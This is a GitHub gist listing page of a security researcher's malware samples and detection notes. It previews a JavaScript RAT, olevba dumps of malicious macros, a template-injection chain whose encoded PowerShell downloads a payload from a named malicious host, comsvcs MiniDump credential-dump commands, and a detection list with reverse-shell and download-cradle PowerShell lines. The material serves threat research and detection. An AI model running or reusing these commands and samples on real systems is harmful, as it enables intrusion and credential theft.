Skip to content

Instantly share code, notes, and snippets.

View JohnLaTwC's full-sized avatar

John Lambert JohnLaTwC

568 followers · 1 following
  • Microsoft Corporation
View GitHub Profile
@JohnLaTwC
JohnLaTwC / APIs
Created February 12, 2020 21:00
Short List of APIs seen in VBA
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32" () As Long
Public Declare Function Keio2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function VEEAAM2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function wspPush2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Declare Function GetLogicalDrives& Lib "kernel32" ()
Declare Function GetShortPathName Lib "Kernel32.dll" Alias _
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" ( _
Declare Function GlobalAlloc Lib "kernel32" (ByVal wFlags As Long, ByVal dwBytes As Long) As Long
Declare Function GlobalLock Lib "kernel32" (ByVal hMem As Long) As Long
@JohnLaTwC
JohnLaTwC / JavaScript RAT
Created February 9, 2018 17:05
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
@JohnLaTwC
JohnLaTwC / examples.txt
Last active December 23, 2023 19:04
comsvcs MiniDump examples
By @JohnLaTwC
References:
https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense)
https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24)
Detection Examples:
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full
@JohnLaTwC
JohnLaTwC / 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Created October 2, 2020 16:23
Recon maldoc
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public RUNNING As Boolean
@JohnLaTwC
JohnLaTwC / 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
Created October 1, 2020 01:41
A very interesting DOCX no?
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long
@JohnLaTwC
JohnLaTwC / template_injection.yara
Created May 8, 2020 17:16
Word OXML Template Injection
rule gen_injected_template_Word
{
meta:
description = "Detects injected templates in DOCX"
author = "John Lambert @JohnLaTwC"
date = "2020-05-03"
hash1 = "a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063"
hash2 = "a275dfa95393148bb9e0ddf5346f9fedcc9c87fa2ec3ce1ec875843664c37c89"
hash3 = "ed4835e5fd10bbd2be04c5ea9eb2b8e750aff2ef235de6e0f18d369469f69c83"
file_protocol_hash1 = "ac6c1df3895af63b864bb33bf30cb31059e247443ddb8f23517849362ec94f08 (settings.xml.rels)"
@JohnLaTwC
JohnLaTwC / ideas.txt
Last active January 30, 2023 14:09
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
@JohnLaTwC
JohnLaTwC / sample chain
Created May 24, 2020 17:31
Template injection attack 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
This file has been truncated, but you can view the full file.
## Sample hash:
## DOCX: 0733b16e7f871c095c124a5da28c554d3e8861d8160d879dbb2c0bc4668012b9
## template injection: 79658efd6d19e0704902af2ea9e3a30a7c2dc624e7195998e3af3c2289877b8d
## VBS: 9d77e8df4dc2c49594dac3bed4373051f3b9dd5f1228d1eeeb63f5d8048d9685
## Payload: 6d3d5cc0a0b26be8180ae4ade5f5cec26c94d06754a62251869d832ac6fe1c0c
## http://moveis-schuster-com.ga/Order.jpg returns:
Powershell.exe -w h $asciiChars='24 54 52 50 3D 27 2A 2E 2A 2D 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 2E 2A 2D 27 2C 27 49 27 29 3B 20 73 61 6C 20 4D 61 73 74 65 72 20 24 54 52 50 3B 27 28 26 28 27 2B 27 47 27 2B 28 27 43 40 40 40 27 2E 72 65 70 6C 61 63 65 28 27 40 40 40 27 2C 27 4D 27 29 29 2B 27 20 2A 57 27 2B 27 2D 4F 2A 29 27 2B 20 27 4E 27 2B 27 65 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 6C 27 2B 27 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 27 2B 27 61 64 27 2B 27 46 27 2B 27 69 27 2B 27 6C 27 2B 27 65 28 27 27 68 74 74 70 3A 2F 2F 6D 6F 76 65 69 73 2D 73 63 68 75 73 74 65 72 2D 63
@JohnLaTwC
JohnLaTwC / d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc
Created March 17, 2020 21:38
maldoc event handler d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc
## Uploaded by @JohnLaTwC
## Sample hash: d4ce4fbd25c4541c08570b3a7bc9b781e3602ab22022c53a2c40428df1d1d9cc / 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 5c2adb7b7d3c534be6f0bbc3750d7c8ea467f80816d4b35a284165c22fb7abdf
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
@JohnLaTwC
JohnLaTwC / bashscript.sh
Created May 6, 2019 14:54
Bash script: 077d51016727216dd6216a3722353be274288d411a6295a5d804d251dacd88fc
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.